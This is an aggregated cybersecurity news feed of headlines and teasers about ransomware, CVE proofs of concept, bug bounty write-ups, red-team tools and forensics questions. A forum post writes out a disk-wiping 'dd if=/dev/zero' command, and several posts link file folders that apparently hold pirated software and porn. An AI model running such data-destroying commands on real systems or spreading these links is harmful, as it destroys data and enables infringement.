    OSINT Trick: Overlaying drone footage onto Google Earth
    It is possible to overlay drone footage onto Google Earth as a way to get more contemporary images of an area. Continue reading on Medium »
  • Open

    Doyensec releases tool for CVE-2022-39299 PoC
    Article URL: https://github.com/doyensec/CVE-2022-39299_PoC_Generator Comments URL: https://news.ycombinator.com/item?id=34714367 Points: 1 # Comments: 1
  • Open

    Impact of Ransomware Attacks on Businesses and Individuals
    Exploring the Devastating Effects and Importance of Implementing Preventative Measures Continue reading on InfoSec Write-ups »
    Chaining Bugs to get my First Bug Bounty
    No content preview
    Cryptography for Blockchain Security
    No content preview
    The Role of Hash Functions in Cryptography
    No content preview
  • Open

    How would I open an NTUSER Registry File I have from an .E01 file?
    SOLVED: THANKS GUYS. So I have an .E01 file that contains an NTUSER registry file in there somewhere, so I opened it in FTK Imager; my question is how could I open that NTUSER registry file in software such as 'Registry Viewer'? I know how to do it for my own user, but this NTUSER is in an .E01 file. Thank you, I am a few weeks into learning this stuff <3 submitted by /u/kreqex
  • Open

    SIEM/SOAR — Red team bypass
    Cloud attacks haven’t yet become very sophisticated. In AWS, most of the external attacks are related to resource mis-configurations… Continue reading on Medium »
    Tripwire — A [red|purple|blue] team lab orchestration tool
    Tripwire is a virtual machine orchestration tool, designed to supplement Red|Purple|Blue team lab environments. It utilizes VMware… Continue reading on Medium »
    Ghostwriter v3.2 Release
    SpecterOps has released Ghostwriter v3.2 with some significant enhancements we think you’ll like. We overhauled how you interact with… Continue reading on Posts By SpecterOps Team Members »
    MITRE ATT&CK Enterprise - Framework | Tactics | Techniques (P1)
    In the series, we're going to cover all the TTPs of all the phases of the MITRE ATT&CK Framework. Continue reading on System Weakness »
    MITRE ATT&CK Enterprise - Framework | Tactics | Techniques (P1)
    In the series, we're going to cover all the TTPs of all the phases of the MITRE ATT&CK Framework. Continue reading on Medium »
  • Open

    ESXiArgs: The code behind the ransomware
    Deep Dive into an ESXi Ransomware: TrustedSec's Nick Gilberti wrote a great blog covering the ESXi ransomware's shell script here. However, in this blog, we are going to dive a little deeper into the code behind this ransomware. The ransomware sample discussed was acquired from VirusTotal and the BleepingComputer forum. The following is a... The post ESXiArgs: The code behind the ransomware appeared first on TrustedSec.
  • Open

    OpenSSH Pre-Auth Double Free - CVE-2023-25136 - Writeup and Proof-of-Concept
    submitted by /u/n0llbyte
    A Year in Review 2022: 100 vulnerabilities you should prioritize - PRIOn
    submitted by /u/gfekkas
    Rustproofing Linux (Part 1, Leaking Addresses)
    submitted by /u/Gallus
    Top 10 web hacking techniques of 2022
    submitted by /u/Fugitif
    Fearless CORS: a design philosophy for CORS middleware libraries (and a Go implementation) :: jub0bs.com
    submitted by /u/jub0bs
    Dota 2 Under Attack: How a V8 Bug Was Exploited in the Game
    submitted by /u/stashing_the_smack
    Recovery script for ESXiArgs ransomware
    submitted by /u/YogiBerra88888
  • Open

    Tidbits of Cross Site Scripting — XSS
    XSS, or cross-site scripting vulnerability, is a frequent web vulnerability. Continue reading on Bug Zero »
  • Open

    SecWiki News 2023-02-08 Review
    No news updated today. For more of the latest articles, visit SecWiki.
  • Open

    FreeBuf Morning Report | India plans to set up "data embassies" within its borders; South Korea's LG suffers data leak
    The Indian government may include the policy as part of the forthcoming Digital Data Protection Bill, which may be tabled in March.
    Hackers exploit Sunlogin (向日葵) vulnerabilities to deploy the Sliver C2 framework
    Cyber attackers are exploiting security vulnerabilities in Sunlogin to deploy the Sliver C2 framework for follow-on "attack and intrusion" activities.
    Unbelievable! Microsoft suffers two major outages in two weeks
    Microsoft suffered its second major cloud service outage in less than two weeks.
    Nearly a month later, LockBit officially claims the attack on the UK's Royal Mail
    LockBit reversed its earlier claim that it had not attacked Royal Mail, recently adding a ransom countdown entry to its data leak site.
  • Open

    i found this directory, and it's fast but i have a problem...
    The problem is, it only works if you know the full link to the file; you can't browse. Does anyone know a way around this? https://bridge.rabbitsun.xyz/Series/ https://bridge.rabbitsun.xyz/Series/Truth%20Be%20Told%202019/S01/Truth.Be.Told.S01E02.480p.WEB.TagName.mkv submitted by /u/TheCrunchRadio
  • Open

    Vulnerable moment-timezone version shipped
    Nextcloud disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1708873
    Suspicious login app ships old league/flysystem version
    Nextcloud disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1720822

  • Open

    Why did dd zero on disk left partition intact?
    Hello all. In trying to make sure I understand how dd works, I made a small disk (sdb), partitioned, formatted, and mounted it in Kali. I loaded some random files and ran xxd -a /dev/disk to see my before state. Then I ran dd if=/dev/zero of=/dev/sdb successfully, and re-ran the xxd command to confirm it was all zeroed out. However, the files I put in the mounted folder were still there. xxd against the partition, sdb1, showed that there was still non-zero content. I wrongly assumed that zeroing the disk would also wipe out the partition. I had to run dd if=/dev/zero of=/dev/sdb1 for everything to be wiped. Can anyone help me understand why this is, or point me in the right direction so I can do my own reading? Thanks. submitted by /u/not_a_lob [link] [comments]
    Foundations of Linux Memory Forensics
    Foundational concepts to understand before venturing into Linux memory forensics Linux process data structures submitted by /u/DFIRWarlock [link] [comments]
    Job Market being a foreigner?
    A thing I’ve never seen someone talking about before: how is the job market in Forensic Analysis/Science as a foreigner? Most are government-related jobs and I would love to know the problems a foreigner will go through and if it’s even possible to work for other governments. Sorry if it was asked before. submitted by /u/seungles [link] [comments]
    File Recovery/ How do I use forensic software to recover game cheats
    This might be a really ridiculous post but I am so desperate. Is there any software that can recover files like exe that doesn't take a long time to do or download? If it can't recover, then that's fine as long as it shows when the file was modified, the name of the file, and the time. Please help!! Will explain more when someone responds. submitted by /u/DanteYo [link] [comments]
  • Open

    List of 41 Frequently Occurring Web Application Vulnerabilities
    These are all considerably more crucial vulnerabilities and are employed in bug bounty programmes. Just add them to your list and gather much… Continue reading on Medium »
    Reveal the Cloud with Google Dorks
    Find sensitive data in Amazon AWS, Google Cloud, and more Continue reading on InfoSec Write-ups »
    Bypassing API Restrictions for Fun and Profit
    Recently, I downloaded and started testing an application locally which provided dashboard access along with REST API endpoints for its… Continue reading on Medium »
    “FREE 350+ Tryhackme Rooms”
    Hey Guys, I am banti samanta, a Security Researcher and a Bug Bounty Hunter. In this blog, I will be sharing a list of 350+ Free Tryhackme… Continue reading on Medium »
    Familiar Recon Tools for Pentesting and Bug Bounty
    10 Essential Tools used for Reconnaissance | Karthikeyan Nagaraj Continue reading on Medium »
    Even more resources to make you a better hacker
    Becoming a “hacker” can mean many different things to different people, so the resources you need to improve will depend on what type of… Continue reading on Medium »
    Deserialization of untrusted data — [502]
    Continue reading on Medium »
    Broken Access Control -Web Application Vulnerability
    Broken Access Control is a vulnerability in which the application fails to enforce access control restrictions and security measures such… Continue reading on Medium »
    10 Essential Tips for Bug Bounty Hunters
    Bug bounty programs have become increasingly popular in recent years as a way for companies to ensure the security of their websites and… Continue reading on Medium »
  • Open

    Why is type 1 hypervisor EDR not a thing?
    The increased prevalence of threat actors targeting hypervisor platforms has only increased over the last few years and the importance of these systems has stayed roughly the same. Why have EDR vendors not begun to make agents compatible with at least the major players? This thought has been going through my head for a few months but the recent development of ESXiArgs presents another example of the need. Here is a good blog post that gives some context on the current campaign. https://www.trustedsec.com/blog/esxiargs-what-you-need-to-know-and-how-to-protect-your-data/ submitted by /u/PolicyArtistic8545 [link] [comments]
    IP Network Support Engineer Trying to get into cyber security
    I am an IP Network Engineer with 5 years working experience as a support engineer in a NOC environment. I am presently struggling to get a job since I completed my MSc. in Networking and Data communications and I am therefore considering adding Cyber security to my list of certifications. I did a module called "Network Information Security" as part of my MSc. program. I was wondering which cyber security certification would be an advancement for my career. I think CISSP is a long way for me. Any advice would be great. submitted by /u/clahws [link] [comments]
    200+ requests containing subdomain "thissubdomainshouldonlyresolveifwildcard.DOMAIN"
    In a DNS hunting report, I saw a spike in NXDOMAIN records for a subdomain that I have not yet seen. There were 200+ requests for FQDNs containing subdomain "thissubdomainshouldonlyresolveifwildcard". Example: thissubdomainshouldonlyresolveifwildcard.IPaddress.arpa[.]net thissubdomainshouldonlyresolveifwildcard[.]mydomain thissubdomainshouldonlyresolveifwildcard[.]myseconddomain I searched our EDR but there are no records for this domain and I am not sure what DNS server is replying NXDOMAIN (internal/external). Due to limited logging, I also cannot see which source IPs made the requests. OSINT shows this subdomain is associated with sinkholes... Is anyone familiar with this? submitted by /u/waaz_techpursuit [link] [comments]
    SOC2 report - Any benefit for a company to get a SOC2 for the company if all data is stored on AWS?
    I am consulting for a company that typically provides AWS' SOC2 report to potential clients since all their client data is stored on AWS. One prospect says that is not enough and they want one for the company itself in addition to AWS'. They also said that they want a SOC2 for the actual product they are considering purchasing from the company. Is this request overkill? Are all three SOC2 reports a reasonable request? submitted by /u/Tyggger [link] [comments]
    Is it a must to find at least one CVE in your career?
    As long as you are a security engineer. submitted by /u/IamOkei [link] [comments]
    How do I change a password on a website with a 403 Error?
    I was told that one of my passwords in chrome had been breached but when I try to go to the website to change it, I am informed that my connection is not private, and then I tried to proceed through and I was met with a 403 - Forbidden Error. How can I change this password, or delete this account to fix this? submitted by /u/gkops [link] [comments]
    Bought a used Wireless Adapter
    Hey how's it going? I've recently purchased the TL-WN722N V1 off of someone online. Bought a used one since I wanted to specifically get the V1. Anyway, what caught my eye was the very low price of €10, while it seems that this piece is going for over 50 (second-hand) in the UK/US. My question is - are there any possible ways this device could be tampered with? What are some ways I can monitor it and check it out just to make sure it's all good? Thanks! submitted by /u/Ledinukai4free [link] [comments]
  • Open

    Ask HN: Any open source options for reviewing vulnerability scanner results?
    There are a lot of good open source vulnerability scanners out there, but are there any good open source options to collect the results of multiple scanners so that you can decide what to do with them? It seems like all of the commercial options are hidden behind an enterprise pricing level. Comments URL: https://news.ycombinator.com/item?id=34699627 Points: 2 # Comments: 0
  • Open

    ESXiArgs: What you need to know and how to protect your data
    Threat Overview Around February 03, 2023, a ransomware campaign called “ESXiArgs” emerged that targeted Internet-facing VMware ESXi servers running versions older than 7.0. Though not confirmed, it has been reported by the French CERT (CERT-FR), BleepingComputer, and other sources that the campaign leverages CVE-2021-21974, which is a three-year-old vulnerability in the OpenSLP component of the... The post ESXiArgs: What you need to know and how to protect your data appeared first on TrustedSec.
    TeamFiltration V3.5.0 – Improve All the Things!
    TeamFiltration was publicly released during the DefCON30 talk, “Taking a Dump In The Cloud”. Before the public release, TeamFiltration was an internal tool for TrustedSec’s offensive security operations, which was shared internally back in January 2021. In short terms, TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring Office 365 Azure AD accounts.... The post TeamFiltration V3.5.0 – Improve All the Things! appeared first on TrustedSec.
  • Open

    CVE-2022-46663: less -R filtering bypass
    Article URL: https://www.openwall.com/lists/oss-security/2023/02/07/7 Comments URL: https://news.ycombinator.com/item?id=34698264 Points: 1 # Comments: 0
  • Open

    🔑 Introducing Matano Identity Data Lake for Open Source Cloud-Native SIEM!
    submitted by /u/shaeqahmed [link] [comments]
    Post-Exploitation: Abusing the KeePass Plugin Cache
    submitted by /u/guedou [link] [comments]
    GitHub - mazen160/secrets-patterns-db: Secrets Patterns DB: A comprehensive open-source regex database for secret detection.
    submitted by /u/mazen160 [link] [comments]
    Discovering a weakness leading to a partial bypass of the login rate limiting in the AWS Console
    submitted by /u/thorn42 [link] [comments]
    Tracing the Linux kernel using Exein Pulsar: a 5 Minute Tutorial
    submitted by /u/hdtrinh [link] [comments]
    A Detailed Analysis of a New Stealer called Stealerium
    submitted by /u/CyberMasterV [link] [comments]
    NETGEAR Nighthawk upnpd Pre-authentication Buffer Overflow
    submitted by /u/luci_morningstart [link] [comments]
    I Built a Self-Destructing USB Drive Part 3
    submitted by /u/Machinehum [link] [comments]
  • Open

    CISSP Exam Prep: Why Training with Practice Questions is the Best Approach
    Maximizing your study efforts and acing the exam: An in-depth look at the benefits of training with practice questions Continue reading on InfoSec Write-ups »
    zxcvbn Password Strength Estimator
    Implementing zxcvbn for your web app is relatively straightforward, and can provide significant benefits in terms of password security. Continue reading on InfoSec Write-ups »
    The Benefits of Implementing a Bug Bounty Program for Your Web App
    A bug bounty program is a crowdsourced approach to identifying and addressing security vulnerabilities in a web application. Continue reading on InfoSec Write-ups »
    The Right Time for a Bug Bounty and Security Team
    Starting a bug bounty program and hiring a security team are important steps for companies to take to ensure the security and… Continue reading on InfoSec Write-ups »
    Step into the World of Virtual Home Labs and Enhance Your Cybersecurity Skills
    No content preview
    Forcing for a bounty$$
    No content preview
    Wardrive without a GPS module and WiFi adapter that supports monitor mode, but a Raspberry Pi
    No content preview
    TAKING OVER MALWARE USING MACHINE LEARNING.
    No content preview
    ARE SMART CONTRACTS REALLY SMART?
    No content preview
    SSRF — Server Side Request Forgery
    No content preview
  • Open

    Dependency confusion in https://github.com/hyperledger/aries-mobile-agent-react-native
    Hyperledger disclosed a bug submitted by r3drush: https://hackerone.com/reports/1763343
  • Open

    SecWiki News 2023-02-07 Review
    No news updated today. For more recent articles, visit SecWiki
  • Open

    Will Fuzzing Replace SAST?
    In many instances, the answer is becoming “when” not “if.” Continue reading on Medium »
  • Open

    Execute Code via EnumWindows Callback
    Introduction Continue reading on Medium »
    Bringing Red Team to SOC
    Red teams and SOC teams serve different but complementary roles in ensuring the security of an organization’s IT systems and data. Red… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | 1,900 new dangerous vulnerabilities expected every month in 2023; IE11 support ends on the 14th of this month
    An average of 1,900 dangerous vulnerabilities per month are expected to be disclosed in 2023, up 13% from 2022, including 270 high-risk and 155 critical vulnerabilities.
    French data protection requirements
    For failing to comply with rules on the use of cookies, including data subject consent and the obligation to inform individuals about cookie use, the French data protection authority CNIL fined Google 150 million euros and Facebook 60 million euros.
    Key ransomware attack vectors and mitigation recommendations
    Ransomware can penetrate and disrupt the normal operations of any organization, which is why understanding the main ransomware attack vectors matters.
    Upgraded GuLoader malware targets the e-commerce sector
    Beyond the United States and South Korea, the ransomware's reach also extends to Germany, Saudi Arabia, Taiwan, and Japan.
    Serial hacker behind more than 50,000 cybercrimes finally arrested in France
    No content preview
    Encrypted messaging app Exclu taken down, multiple arrests
    The app is estimated to have 3,000 users, including members of organized crime groups.
    Ningbo Commerce Bank spring recruitment fair for technology talent
    Resume submission email: zhhr@ncbank.cn.
    Malicious file analysis series: Xmrig family cryptomining malware analysis (Part 2)
    Analysis of the Xmrig family cryptomining malware: based on the characteristics the miner exhibits, a combination of dynamic and static analysis together with differential comparison is used to locate and analyze the program's rootkit implementation points.
  • Open

    Let’s Go (VS) Code - Red Team style
    https://badoption.eu/docs/blog/2023/01/31/code_c2.html VSCode has a portable binary, which also allows a reverse shell and some other nice features (File Explorer, Debugging, Local Port Forwarding). Authentication is via GitHub and hosting is completely on MS domains. PS: I am the author, so if there are any questions or feedback let me know. submitted by /u/PfiatDe [link] [comments]
    Spoofing MS Office comments
    https://badoption.eu/blog/2023/02/06/spoof_office_comments.html MS Office does not verify comments, as they are stored in the file. Allows spoofing of author and/or comments, even cross-tenant for AAD. submitted by /u/PfiatDe [link] [comments]
    Best way to set up for assumed breach?
    I have OSCP training and web app pentesting experience but I'm new to the red team/purple team type stuff. How do you folks normally set up for assumed breach scenarios? Say you have a client that wants to do an assumed breach purple team assessment of their on-prem domain and you have a cobalt strike server set up. How do you ask them to set up for you? Do you... ask them to set up a machine on the domain and give you creds to it? ask them to turn off whatever protections so you can put a beacon on the machine? just ask for information to vpn to the network? etc. What exactly is the normal way you would do this? submitted by /u/Jumpy_Hamster [link] [comments]
  • Open

    Seems Like A Jackpot To Me
    https://drive.google.com/drive/folders/1S-zjW17dRGK3XEi8l1T5bEUHJqMxto5X contains movies, software and tons of learning content. Everything I saw in it was organised. submitted by /u/False-Celebration930 [link] [comments]
    Is there a way to preview open directories like in Google Drive?
    The way files can be previewed in Google Drive, is it possible to do the same with any open directory with any extension or something else? submitted by /u/False-Celebration930 [link] [comments]
    Female Dragons (illustrations)
    https://drive.google.com/drive/folders/12IaTHgSgBrr8-NWm6eEaaHhJTiLCNJat submitted by /u/False-Celebration930 [link] [comments]
  • Open

    TryHackMe :: OhSINT Write-up
    Today, we will use some OSINT-related techniques to discover the flags of the OhSINT room on THM. OSINT [Open Source… Continue reading on Medium »
    OhSINT room tryhackme
    So yeah, this is actually my first ever article to write in my Medium, hope I can do more. The sole reason for me doing this is to record… Continue reading on Medium »
  • Open

    Why Lists?
    So much of what we see in cybersecurity, in SOC, DFIR, red teaming/ethical hacking/pen testing, seems to be predicated on lists. Lists of tools, lists of books, lists of sites with courses, lists of free courses, etc. CD-based distros are the same way, regardless of whether they're meant for red- or blue-team efforts; the driving factor behind them is often the list of tools embedded within the distribution. For example, the Kali Linux site says that it has "All the tools you need". If you go to the SANS SIFT Workstation site, you'll see the description that includes, "...a collection of free and open-source incident response and forensic tools." Here's a Github site that lists "blue team tools"...but that's it, just a list. Okay, so what's up with lists, you ask? What's the "so, what?"  …
  • Open

    Fuzzing ATM/POS protocols like a Boss
    Generally the buffer overflow family targets common protocols like HTTP, SMB, FTP, …; indeed there is a lack of papers, tools, and exploits targeting financial/payment protocols like NDC and ISO8385. In this article I present two fuzzers for the protocols ISO8385 and NDC, hoping that it will help other security enthusiasts and developers. The goal of these tools is to quickly find/fix security holes like DoS/buffer overflows in the code of the ATM/POS service protocols. Below is the link to the article: https://www.linkedin.com/pulse/fuzzing-atmpos-protocols-like-boss-karim-reda-fakhir/?published=t submitted by /u/kikikoko1983 [link] [comments]

  • Open

    Give me your rootkit sleuth kit.
    Hey, all. I’m okay versed in computers, but I’m nothing fancy—the extent of my meanderings might be setting up arch Linux in VM or Debian on old laptops I don’t know the password to. Recently my Mac ran into some issues and I believe them to be coming from a USB3 to HDMI cord from amazon. Immediately after plugging in the cord I experienced massive changes in my GUI. The crispness of windows was lost, i had different cursors, and I could resize windows only x and y axis— losing the ability to size diagonally. I was in photoshop at the time and it kept wanting to crash, but before the cord I’d had no problems. Things seemed so funky. The environment was reminiscent of being in a virtual machine or booting an ISO image from a flash drive. After seeing if settings would aid me in returnin…
    Galaxy vs. iPhone for security
    My Galaxy S20 finally crapped out and I need to get a new phone. I'm deciding between getting a Galaxy S23 or an iPhone 14. They seem pretty comparable with some benefits to both but I was wondering what the general consensus is regarding their security. I know Google is pretty notorious for issues with customer data but my knowledge about this is pretty outdated. Thanks! submitted by /u/MoonlightToast [link] [comments]
    Can Google see my HTTPS traffic when using Chrome?
    Can Google see my HTTPS traffic when using Chrome? submitted by /u/Bored-Giraffe [link] [comments]
    What do you think about free Elastic SIEM?
    Hi folks, do you have experience with Elastic SIEM (subscription - Free and open - Basic)? What are you finding lacking? Would you recommend using this SIEM? Maybe there are some fanatical Elastic SIEM gurus :) in the community whom I could read on this topic? submitted by /u/athanielx [link] [comments]
  • Open

    Diving Deeper Into Pre-created Computer Accounts
    submitted by /u/dmchell [link] [comments]
  • Open

    The Open Source Intelligence (OSINT)
    1.) What is open source intelligence: Continue reading on Medium »
    Week14Blog-OSINT
    Open Source Intelligence (OSINT) has a long history of use in the intelligence community and is a standard tool for security services… Continue reading on Medium »
    Corporate OSINT for Social Engineering
    If your work involves protecting organizations from social engineering attacks, you will most probably also be required to conduct… Continue reading on The First Digit »
    Corporate OSINT for Social Engineering
    If your work involves protecting organizations from social engineering attacks, you will most probably also be required to conduct… Continue reading on Medium »
    Mengenal OSINT Analyst
    An Open Source Intelligence (OSINT) Analyst is someone who has the ability, skills, and structured analytical capacity and… Continue reading on Medium »
  • Open

    Fraudulent claim of business.
    Yelp disclosed a bug submitted by ilpadrino: https://hackerone.com/reports/1422227
    Mail app - blind SSRF via smtpHost parameter
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1746582
    Mail app - Blind SSRF via Sieve server functionality and sieveHost parameter
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1741525
    Mail app - blind SSRF via imapHost parameter
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1736390 - Bounty: $150
  • Open

    What is Broken Access Control bug ?
    Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized… Continue reading on Medium »
    HAI Utility in HackenProof: Get More Bounties with HAI
    As part of the new HAI utility implementation, we’re announcing its extension to HackenProof. Continue reading on Medium »
    Bug Bounty: A Comprehensive Guide | 2023
    Start Hunting the Bugs…Not only For Money…For Satisfaction | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    OWASP 10 Vulnerability
    Top 10 Web Application Security Risks Continue reading on Medium »
    OTP Bypass By Response Manipulation
    Want to earn 3-digit $$$? A 15 min read. Continue reading on Medium »
    Automotive Hacking: A Growing Concern
    The rise of the connected car has brought about many new and exciting innovations to the automotive industry. From advanced infotainment… Continue reading on Medium »
    A zero day for demo servers and internal government networks
    hey all, it’s been a long time since i posted here, and much has happened (multiple p1s on various programs :)). but here we are once… Continue reading on Martian Defense Cybersecurity »
    Bug Bounty for Beginners (Part 2): Recon for Modern Bug Bounty Hunting
    This article in the series contains a high-level overview of different tools and techniques used for automating reconnaissance processes… Continue reading on Martian Defense Cybersecurity »
    Top 10 Tools for Ethical Hacking in 2023 - Beginners
    Acunetix Continue reading on Medium »
    Rate Limiting -Web Application Vulnerability
    One method of controlling network traffic is rate restriction. It limits the number of times someone may take a certain action — like… Continue reading on Medium »
  • Open

    Alternative Methods When Performing a Black Box Pentest
    In this article, I will discuss how to "test" effectively using the Black Box testing methodology. Black Box is… Continue reading on MII Cyber Security Consulting Services »
    CRTP Certification Review
    Before I go into the details of my experience with the CRTP certification, I’ll give some background of myself. Continue reading on Medium »
  • Open

    Hacking into Toyota's global supplier management network
    submitted by /u/EatonZ [link] [comments]
  • Open

    SecWiki News 2023-02-06 Review
    A survey of the ATT&CK mapping capabilities of online sandboxes by Avenger; SecWiki Weekly (Issue 466) by ourren; Yawf: an open-source automated web vulnerability detection tool by ourren. For more recent articles, visit SecWiki
  • Open

    IW Weekly #45: RCE in Avaya Aura Device Services, Bypass Sign-Up Pages, JWT Hacking, Broken…
    No content preview
    IW Weekly #42: $1M bounty explained, GCP takeover, iOS pentesting, Smart Contract…
    No content preview
    IW Weekly #41: VueJS XSS, Critical Car-Vulnerabilities, $1000 IAP Proxy Misconfiguration in…
    No content preview
    Scheduling Recon Scripts with Docker
    Cronjobs are useful for scheduling tasks to run automatically at a specified time or interval. In this tutorial, we’ll go over how to set… Continue reading on InfoSec Write-ups »
    Exploiting CSRF chaining with IDOR
    No content preview
    Understanding and Preventing CSRF Attack: About CSRF
    No content preview
    Bypass SSL Pinning in Android Phones — Part 2
    No content preview
    Bypass SSL Pinning in Android Phones — Part 1
    No content preview
    Exploring FTP Vulnerabilities through Hands-On Testing in a Virtual Lab Environment
    No content preview
    SERIALIZATION VULNERABILITIES [JAVA][Explained & Exploited]
    No content preview
  • Open

    Italy warns hackers targeting known server vulnerability
    Article URL: https://www.reuters.com/world/europe/italy-sounds-alarm-large-scale-computer-hacking-attack-2023-02-05/ Comments URL: https://news.ycombinator.com/item?id=34677909 Points: 1 # Comments: 2
  • Open

    ExploitDev, Malware & Reverse Engineering IRC
    Hey guys! I've got an idea. As you all know, ExploitDev, MalwareDev and Reverse Engineering aren't easy fields to get into for newcomers. While there are at least some resources (CTFs, Pwn College, etc.) out there, it's still a quite complicated, niche field. Many newcomers like myself get overwhelmed pretty soon and even if they decide to go further it's a hard, lonely road. That's where my idea comes in: why not open an IRC where ExploitDevs help ExploitDevs, and so on. It would be a great way for newcomers to connect, learn together and help each other out as well as a great way for more experienced people to give back to the community. So think about it guys; if you hate it, hate it, but if not send me a DM. If enough people are interested I'll open the IRC! Thank you! Hope to find many like-minded people! submitted by /u/xenonexi [link] [comments]
  • Open

    FreeBuf Morning Report | 16-year-old hacker claims to have cracked the Nintendo NX; Bermuda critical infrastructure suffers a "serious incident"
    A BreachForums member claims to have hacked the Nintendo NX console of the Japanese multinational video game company.
    Budget and employee training: two hurdles enterprise cybersecurity programs cannot avoid
    23% of executives said they worry that malicious employee behavior will expose the company to cyber threats.
    New ransomware attacking VMware ESXi servers worldwide
    Attackers are deploying the new ESXiArgs ransomware on unpatched VMware ESXi servers around the world via a remote code execution vulnerability.
  • Open

    Vintage Bike Racing
    https://drive.google.com/drive/folders/0B6j57G0xlEZsSFlPUFFYZ09DSGM?resourcekey=0-4sEDlWavnGdoNcJGfFGDKw submitted by /u/False-Celebration930 [link] [comments]
    Anime Girls
    https://drive.google.com/drive/folders/0B_JoWW2c0wtvV3NyNEo2T0FDams?resourcekey=0-YyizbUZ_XPi_p7UzMt_eRw submitted by /u/False-Celebration930 [link] [comments]
    WLIA Public Document Archive
    https://drive.google.com/drive/folders/0BwFTRb4izOv4RVRPWWxyZFU4NDg?resourcekey=0-SD3STU_1pj2rHOLAOyU7Ew submitted by /u/False-Celebration930 [link] [comments]
    Softwares and ebooks
    https://drive.google.com/drive/folders/0B8EZX-tft3DaY3FhTXJUdlB5Vm8?resourcekey=0-upP0FqYgtZrKmEkv_rmK9Q submitted by /u/False-Celebration930 [link] [comments]
    Some 2017 or older meme docs
    https://drive.google.com/drive/folders/0B0JuFoyL_HACYmRDNWI0NTdQckk?resourcekey=0-hao98LVzTcP5tjErBVq7Rg there can be nsfw submitted by /u/False-Celebration930 [link] [comments]
    IDK what to say about this....
    https://drive.google.com/drive/folders/11Lm0WP-Sw77DXUJMq4lYeXcNwvaBUllt this is men porn ... gay porn could be present too. https://drive.google.com/drive/folders/1JSrPXI0oZMBVsus68NBvZdOAoZw309t5 this is someone's toy vid collection submitted by /u/False-Celebration930 [link] [comments]
    Tickle Videos
    https://drive.google.com/drive/folders/12868ht9Mi3uZ7t9kVo6hHXhetmNnHfBx submitted by /u/False-Celebration930 [link] [comments]

  • Open

    Exploit Education's Phoenix Stack Four Challenge Writeup
    Hi everyone, I have just released the writeup for Exploit Education's Phoenix Stack Four challenge. Any reactions & feedback would be most welcome. Thanks in advance! https://medium.com/@secnate/phoenix-challenges-stack-four-6366b29a1223 submitted by /u/ProgrammingBro123 [link] [comments]
    Looking for an ExploitDev Mentor!
    Hey guys! I'm a somewhat experienced programmer, fluent in Python, C and Ruby, and just getting into Assembly as well. I've got some experience in hacking in general and have been using Linux as my main OS for several years. I wasn't sure where I wanted to go for the longest time, but I've decided to specialize in Reverse Engineering, Exploit & Malware Development and Malware Analysis. Since I've started learning I can't stop; I've really found my passion. I don't wanna be some random pentester using an endless list of automated tools they barely even understand. I want to know every system and OS in and out; I wanna use my creativity and my passion for writing every exploit, every piece of malware myself from scratch. I want to be able to interact and talk to my computer directly, like all the hackers in the 70s or 80s did. I love doing what I do, so I wanna do it right. Like I said, programming is not a problem: I bring experience in software development, C, Ruby, Python, Assembly as well as SQL, PHP, Ruby on Rails and Java, although I gotta say all that web stuff never really interested me all that much. I wanna work with computers, software and OSes. So is there maybe someone who'd stay in contact, mentor me, could help me learn, or who knows, even work on that stuff together? I'd be so happy! For more extensive mentoring I'd be happy to pay you as well! submitted by /u/xenonexi

    Easy Account Takeover on dell subdomain
    Peace be upon you, and the mercy and blessings of God. Continue reading on Medium »
    See you in https://pentesting.academy
    After trying Medium to host my blog didn’t match my expectations. Good news is that I was able to export all my old entries, so there is… Continue reading on Medium »
    Blocked User Can Sent messege ||Business Logic Flaw ||Hackerone
    Hello, Amazing hackers . My name is Imamul Mursalin I am a Bug Bounty Hunter. This is my 3rd Write-up, hope You guys will enjoy it and… Continue reading on Medium »
    How I Was Able to Takeover User Accounts via CSRF on an E-Commerce Website
    We’ll discuss the topic of cross-site request forgery (CSRF) vulnerabilities and how it can lead to a one-click account take Continue reading on Medium »
    Character Chaos: Looking Beyond CRLF Injections and Finding Similar Attack Vectors to Manipulate…
    This research all began when I looked at a list of various ASCII characters in the standard and thought to my self “Could there be other… Continue reading on Medium »

    CVE-2022-44268 - Arbitrary File Read PoC - PNG generator
    submitted by /u/voidz0r
    StarHound - CLI tool for importing BloodHound's Active Directory and Azure data (for latest SharpHound/AzureHound data collectors)
    submitted by /u/malacupa
    The Defender's Guide to OneNote MalDocs
    submitted by /u/SuaveHobo
    Reversing UK mobile rail tickets
    submitted by /u/Gallus

    MS Office Phishing: Do most phishing attempts exploit Macros?
    If a user has macros disabled in Office, does that mean to say they're now safe from phishing attempts involving MS Office? submitted by /u/baghdadcafe
    An unidentified filesystem while analyzing a firmware
    Hi, not sure if that's the right place for such question(s). I was recently analyzing the firmware of some router, and while trying to extract the firmware's content I came across a magic saying "PFS/1.0" for the file system. As much as I searched, I haven't really found anything related to that, and I was curious to find out what it is. If that's not the place for such a question, I'm sorry, and I would like to know what section is suitable for such questions. Thanks. submitted by /u/Life_Afternoon_8210
    Nmap doesn’t scan my home network on kali using vmware
    Complete beginner to Kali Linux. I am trying to do a network scan of my home router on Kali Linux on VM Workstation, but it doesn't scan my home router. It only scans the virtual machine network. Does it have something to do with the VMware settings, or is it something else I am doing wrong? submitted by /u/Wonderful_Warrior

    Red Team Reconnaissance and find vulnerability through tool
    I'm cyberindia. Today I'm going to write about the recon step of red teaming. Here only commands are given for recon and finding vulnerabilities through active… Continue reading on Medium »

    How should the state and society use information obtained from open sources, "OSINT"…
    The material is taken from the magazine "The Economist". Continue reading on Medium »
    SPY NEWS: 2023 — Week 5
    Summary of the espionage-related news stories for the Week 5 (29 January-4 February) of 2023. Continue reading on Medium »
    OSINT — Both Sides
    Open Source Intelligence (OSINT) refers to the collection and analysis of publicly available information to gather intelligence on a… Continue reading on Medium »

    Fix Imagemagick CVE-2022-44268 in Ubuntu packages
    Article URL: https://makandracards.com/operations/532974-fix-cve-2022-44268-in-ubuntu-packages Comments URL: https://news.ycombinator.com/item?id=34666067 Points: 2 # Comments: 0
    KingMe – Chess Cve [pdf]
